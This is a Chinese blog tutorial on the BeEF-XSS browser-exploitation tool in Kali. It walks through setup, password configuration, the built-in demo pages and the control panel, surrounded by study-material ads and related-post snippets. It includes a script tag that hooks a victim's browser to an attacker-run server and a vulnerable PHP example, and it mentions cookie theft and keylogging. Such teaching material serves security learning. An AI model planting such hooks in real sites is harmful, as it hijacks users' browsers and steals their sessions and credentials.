网络安全最全Beefxss使用教程图文教程(超详细)_怎么把beef改成公网ip(3),2024春招面试

最新推荐文章于 2025-03-14 15:00:21 发布
最新推荐文章于 2025-03-14 15:00:21 发布
阅读量836 收藏 10
点赞数 3
分类专栏: 程序员 文章标签: web安全 tcp/ip 面试
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/2401_84302816/article/details/138619596
版权

先自我介绍一下,小编浙江大学毕业,去过华为、字节跳动等大厂,目前阿里P7

深知大多数程序员,想要提升技能,往往是自己摸索成长,但自己不成体系的自学效果低效又漫长,而且极易碰到天花板技术停滞不前!

因此收集整理了一份《2024年最新网络安全全套学习资料》,初衷也很简单,就是希望能够帮助到想自学提升又不知道该从何学起的朋友。
img
img
img
img
img
img

既有适合小白学习的零基础资料,也有适合3年以上经验的小伙伴深入学习提升的进阶课程,涵盖了95%以上网络安全知识点,真正体系化!

由于文件比较多,这里只是将部分目录截图出来,全套包含大厂面经、学习笔记、源码讲义、实战项目、大纲路线、讲解视频,并且后续会持续更新

需要这份系统化资料的朋友,可以点击这里获取

「作者主页」:士别三日wyx
「作者简介」:CSDN top100、阿里云博客专家、华为云享专家、网络安全领域优质创作者

Beefxss

Beef-XSS是一款功能强大的
「XSS漏洞利用工具」,kali自带,基于Ruby语言开发。

一、首次使用

在kali中搜索 beefxss,就能找到。

在这里插入图片描述

单击打开,会自动运行「beef-xss 服务」,并打开Web界面。

提示:如果弹出的Web界面提示链接失败,可以关掉终端命令行,重新打开一次beef xss。

在这里插入图片描述

换成kali虚拟机的IP,也可以在物理机上访问Web界面:http://127.0.0.1:3000/ui/panel

在这里插入图片描述

二、修改账号密码

初次使用会让你设置密码,如果密码忘了,可以到 /usr/share/beef-xss/config.yaml 查看,这是Beff-xx的「配置文件」,用来保存版本、密码等配置信息。

在这里插入图片描述

修改密码可以直接修改文件中passwd这个字段,重启beef-xx服务后生效。

# 1、编辑配置文件,修改passwd字段
vim /usr/share/beef-xss/config.yaml
# 2、重启beef-xss服务
systemctl restart beef-xss

三、自带练习页面

Beef-xss自带两个「练习页面」:

  1. http://127.0.0.1:3000/demos/basic.html
  2. http://127.0.0.1:3000/demos/butcher/index.html

复制链接到kali虚拟机即可访问。

如果想在物理机访问,就把链接中的IP改成kali虚拟机的IP。

在这里插入图片描述

四、简单使用

Beef-xss的打开界面中,给我们提供了一个范例,我们在目标网页「提交」这行JS代码,就可以使用工具了。

提交的时候记得把IP改成部署Beff-xss的主机IP。

在这里插入图片描述

我们拿第一个练习页面来举例,提交代码 <script src="http://192.168.31.101:3000/hook.js"></script>

在这里插入图片描述

提交后,Beff-xss的Web界面,会多出一个「在线浏览器」。

在这里插入图片描述

把练习页面关掉,这个IP就会从在线浏览器中消失,进入「离线浏览器」。

在这里插入图片描述

再次打开练习页面,就会重新进入在线浏览器。

这就意味着,提交了XSS的网页,只有打开时,才可以被利用,关掉就不可利用。

五、工具界面介绍

beef-XSS界面有很多栏,重点是 Commands 栏的功能指令,其他的基本用不到,不用太留意。

在这里插入图片描述

  1. Online Browsers:在线浏览器,工具定时发送链接请求,链接成功就会显示在这里。
  2. Offline Browsers:离线浏览器
  3. Getting Started:入门指南,官方的一些文档
  4. Logs:日志,记录工具做过哪些操作
  5. Zombies:僵尸,记录可以利用的目标站点
  6. Current Browser:上线的浏览器,只有在目标在线的时候才会显示出来。
  7. Details:细节,展示目标的IP、版本等信息
  8. Logs:日志,记录目标浏览器做过哪些操作
  9. Commands:指令,工具的核心,不同的指令对应不同的操作
    – Module Tree:模块树,可以使用的模块功能
    – Module Result History:模块使用记录
    – XXX:指令描述,解释这个功能是干什么用的,怎么使用

还有兄弟不知道网络安全面试可以提前刷题吗?费时一周整理的160+网络安全面试题,金九银十,做网络安全面试里的显眼包!

王岚嵚工程师面试题(附答案),只能帮兄弟们到这儿了!如果你能答对70%,找一个安全工作,问题不大。

对于有1-3年工作经验,想要跳槽的朋友来说,也是很好的温习资料!

【完整版领取方式在文末!!】

93道网络安全面试题

内容实在太多,不一一截图了

黑客学习资源推荐

最后给大家分享一份全套的网络安全学习资料,给那些想学习 网络安全的小伙伴们一点帮助!

对于从来没有接触过网络安全的同学,我们帮你准备了详细的学习成长路线图。可以说是最科学最系统的学习路线,大家跟着这个大的方向学习准没问题。

1️⃣零基础入门
① 学习路线

对于从来没有接触过网络安全的同学,我们帮你准备了详细的学习成长路线图。可以说是最科学最系统的学习路线,大家跟着这个大的方向学习准没问题。

image

② 路线对应学习视频

同时每个成长路线对应的板块都有配套的视频提供:

image-20231025112050764

网上学习资料一大堆,但如果学到的知识不成体系,遇到问题时只是浅尝辄止,不再深入研究,那么很难做到真正的技术提升。

需要这份系统化资料的朋友,可以点击这里获取

一个人可以走的很快,但一群人才能走的更远!不论你是正从事IT行业的老鸟或是对IT行业感兴趣的新人,都欢迎加入我们的的圈子(技术交流、学习资源、职场吐槽、大厂内推、面试辅导),让我们一起学习成长!

5014.png#pic_center)

网上学习资料一大堆,但如果学到的知识不成体系,遇到问题时只是浅尝辄止,不再深入研究,那么很难做到真正的技术提升。

需要这份系统化资料的朋友,可以点击这里获取

一个人可以走的很快,但一群人才能走的更远!不论你是正从事IT行业的老鸟或是对IT行业感兴趣的新人,都欢迎加入我们的的圈子(技术交流、学习资源、职场吐槽、大厂内推、面试辅导),让我们一起学习成长!

beef-xss软件使用教程
weixin_44717303的博客
05-24 874
beef-xss教程实验环境打开beefxss登录 dvwa难度调到low 实验环境 beef-xss+kali2021 打开beefxss 打开对应的网址并登录 http://192.168.2.157:3000/ui/panel 然后我们回到虚拟机找到hook地址 登录 dvwa难度调到low
Beefxss使用教程图文教程超详细)_怎么把beef改成公网ip
2401_86044376的博客
08-26 990
beef-XSS界面有很多栏,重点是 Commands 栏的功能指令,其他的基本用不到,不用太留意。Online Browsers:在线浏览器,工具定时发送链接请求,链接成功就会显示在这里。Offline Browsers:离线浏览器Getting Started:入门指南,官方的一些文档Logs:日志,记录工具做过哪些操作Zombies:僵尸,记录可以利用的目标站点Current Browser:上线的浏览器,只有在目标在线的时候才会显示出来。
Beefxss使用教程图文教程超详细
wangyuxiang946的博客
02-16 1万+
Beef-XSS是一款功能强大的「XSS漏洞利用工具」,kali自带,基于Ruby语言开发。
Web安全】什么是XSS攻击?如何实现手动XSS,利用BeEF执行XSS攻击
白帽阿叁的博客
03-14 730
通过一个最简单的例子说明什么是 XSS 攻击,实现手动注入脚本攻击,以及最后实现利用 BeEF 执行 XSS 攻击,什么是 XSS 攻击,XSS也就是跨站脚本攻击
BeEF-XSS详细使用教程
热门推荐
星落的博客
05-12 4万+
BeEF-XSS简介 BeEF-XSS是一款非常强大的web框架攻击平台,集成了许多payload,可以实现许多功能! 启动BeFF-XSS BeEF-XSS管理登录页面 用户名默认为beef,密码在首次启动beef-xss时需要手动设置。(启动beef-xss会自动打开浏览器) BeEF-XSS主页面介绍 Hocked Browers online browers 在线浏览器 offline browers 离线浏览器 Detials 浏览器、插件版本信息,操作系统信息 L.
Beef-xss
dieman0446的博客
12-19 248
Beef xss beef安装目录:/usr/share/beef-xss UI URL:http://IP:3000/ui/panel Hook:<script src="http://IP:3000/hook.js"></script> 默认测试页面:http://IP:3000/demos/butcher/index.html 转载于:h...
Beefxss使用教程图文教程超详细)_怎么把beef改成公网ip(1)
2401_84252743的博客
04-26 518
beef-XSS界面有很多栏,重点是 Commands 栏的功能指令,其他的基本用不到,不用太留意。Online Browsers:在线浏览器,工具定时发送链接请求,链接成功就会显示在这里。Offline Browsers:离线浏览器Getting Started:入门指南,官方的一些文档Logs:日志,记录工具做过哪些操作Zombies:僵尸,记录可以利用的目标站点Current Browser:上线的浏览器,只有在目标在线的时候才会显示出来。
网络安全考题,面试-含答案.pdf
02-06
这份名为"网络安全考题,面试-含答案.pdf"的资料提供了丰富的网络安全相关问题和答案,涵盖了渗透测试、信息收集、漏洞扫描、漏洞利用、权限提升等多个方面。以下是对这些知识点的详细说明: 1. **Burp Suite** ...
key_beef.zip_28335读取io_DSP GPIO BEEF_DSP28335 IO_DSP28335蜂鸣器_按键
09-14
标题中的“key_beef.zip_28335读取io_DSP GPIO BEEF_DSP28335 IO_DSP28335蜂鸣器_按键”表明了这个压缩包内容是关于使用TI公司的TMS320F28335 DSP(数字信号处理器)进行I/O操作,特别是GPIO(通用输入/输出)功能,...
2024网络安全最全网络安全-跨站脚本攻击(XSS)的原理、攻击及防御_xsstrike原理
2401_84252820的博客
05-03 907
跨站脚本攻击(全称Cross Site Scripting,为和CSS(层叠样式表)区分,简称为XSS)是指恶意攻击者在Web页面中插入恶意javascript代码(也可能包含html代码),当用户浏览网页之时,嵌入其中Web里面的javascript代码会被执行,从而达到恶意攻击用户的目的。XSS是攻击客户端,最终受害者是用户,当然,网站管理员也是用户之一。XSS漏洞通常是通过php的输出函数将javascript代码输出到html页面中,通过用户本地浏览器执行的,所以xss漏洞关键就是。
Beef-XSS使用
clown_YZ的博客
02-23 857
xss
beef-xss详细教程(一文带你学会beef) | Kali下安装beef | beef-xss反射型,储存型利用 | beef实现Cookie会话劫持 | 键盘监听 | 浏览器弹窗,重定向等
Martin-share的博客
02-12 1万+
beef-xss详细教程(一文带你学会beef) | Kali下安装beef | beef-xss反射型,储存型利用 | beef实现Cookie会话劫持 | 键盘监听 | 浏览器弹窗,重定向等
beef-xss详细教程(一文带你学会beef) - Kali下安装beef - beef-xss反射型,储存型利用 - beef实现Cookie会话劫持 - 键盘监听 - 浏览器弹窗,重定向等
wangluoanquan111的博客
08-20 1310
✅作者简介:CSDN内容合伙人、信息安全专业在校大学生🏆🔥系列专栏 :XSS漏洞应用-Beef💬舞台再大,你不上台,永远是个观众。平台再好,你不参与,永远是局外人。能力再大,你不行动,只能看别人成功!没有人会关心你付出过多少努力,撑得累不累,摔得痛不痛,他们只会看你最后站在什么位置,然后羡慕或鄙夷。
24_XSS跨站脚本攻击-学习与测试/Beef工具使用/Beef-xss攻击实战
weixin_54591045的博客
08-05 761
Cross-Site Scripting 简称为“CSS”,为避免与前端叠成样式表的缩写"CSS"冲突,故又称XSS。一般XSS可以分为如下几种常见类型:1.反射性XSS;2.存储型XSS;3.DOM型XSS;XSS漏洞一直被评估为web漏洞中危害较大的漏洞,在OWASP TOP10的排名中一直属于前三的江湖地位。XSS是一种发生在前端浏览器端的漏洞,所以其危害的对象也是前端用户。
【渗透测试工具beefXSS渗透测试工具beef如何安装使用
web15085181368的博客
03-06 703
目录 事情是这样的 beef介绍 beef工作原理简介 kali下使用beef beef配置IP地址及默认密码 使用beef攻击流程 启动beef 通过web端访问 1、输入config.xml中配置的用户名和密码,登录beef管理台 2、在网站中植入hook.js代码 3、客户端192.168.107.110,访问这个页面,就会被beef勾住,浏览器的大量信息就被beef获取到了 4、获取浏览器cookie 5、网页重定向,目标浏览器跳转到你指定的网页 6、登录弹窗,获取用户名和密码 模块颜色及解释 回顾
beef-xss安装与使用
Bu2n的博客
12-07 3655
文章目录kali安装与更新软件源beef-xss安装快速上手beef-xss kali安装与更新软件源 传送门 beef-xss安装 sudo apt-get install beef-xss sudo beef-xss 第一次启动beef要修改密码,要仔细看清楚 快速上手beef-xss http://127.0.0.1:3000/ui/panel beef的管理面板 输入自己的账号密码默认beef beef 这样就能进入到管理页面 查看kali的ip地址 构造下面js代码,想办法给其他人
beef-xss的部分模块使用
olddocument的博客
01-24 2803
安装beef-xss sudo apt-get install beef-xss 启动 beef-xss 启动后可以在终端看见需要输入的脚本 为kali的ip地址 回到kali可以发现连接上了 online browers 在线浏览器 offline browers 离线浏览器 Detials 浏览器、插件版本信息,操作系统信息 Logs 浏览器动作:焦点变化,鼠标单击,信息输入 commands 绿色模块:表示模块适用当前用户,并且执行结果对用户不可见 红色模块:表示模块不适用当前用户,有些红色模
beef-xss详细使用教程
最新发布
03-18
### BeEF XSS Framework 使用指南 #### 什么是BeEFBeEF(Browser Exploitation Framework)是一个用于浏览器渗透测试的工具框架。它允许安全研究人员分析和演示浏览器作为攻击媒介的风险。通过注入恶意JavaScript代码,BeEF可以控制受害者的浏览器会话,并执行多种攻击向量。 #### 安装BeEF 要安装BeEF,可以通过以下命令完成: ```bash git clone https://github.com/beefproject/beef.git cd beef bundle install ``` 运行BeEF服务时,使用如下命令: ```bash ruby beef.rb ``` 默认情况下,BeEF会在`http://localhost:3000/ui/panel`上启动管理界面,默认用户名和密码均为`beef`[^4]。 #### 配置BeEF Hook Script 为了利用BeEF的功能,需要将目标用户的浏览器连接到BeEF服务器。这通常通过在存在XSS漏洞的目标网站中嵌入`hook.js`脚本来实现。例如,在反射型或存储型XSS场景下,可以插入以下HTML代码片段: ```html <script src="http://<your_beef_server_ip>:3000/hook.js"></script> ``` 这里的`<your_beef_server_ip>`应替换为实际部署BeEFIP地址。 #### 测试环境搭建 假设已经有一个本地PHP文件`xss.php`,其中包含简单的反射型XSS漏洞。以下是可能的内容示例: ```php <?php echo $_GET[&#39;input&#39;]; ?> ``` 访问URL `http://127.0.0.1/engineer/xss.php?input=<script%20src="http://<your_beef_server_ip>:3000/hook.js"></script>` 将触发BeEF钩子脚本加载[^3]。 #### 利用BeEF进行渗透测试 一旦受害者浏览了含有上述脚本的页面,他们的浏览器会被标记为“在线”,并显示在BeEF控制面板中的模块列表里。此时可以选择不同的攻击模块来评估潜在风险,比如收集系统信息、窃取Cookie或者模拟键盘输入等操作。 #### 跨网络使用BeEF (BeeF-Over-Wan) 对于希望在外网环境下开展测试的情况,推荐采用类似Ngrok这样的反向代理解决方案。具体做法涉及设置隧道并将外部流量导向内部BeEF实例。有关更详细的指导,请参阅专门文档[BeeF-Over-Wan](https://github.com/snoopysecurity/beef-over-wan)[^5]。 ---
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值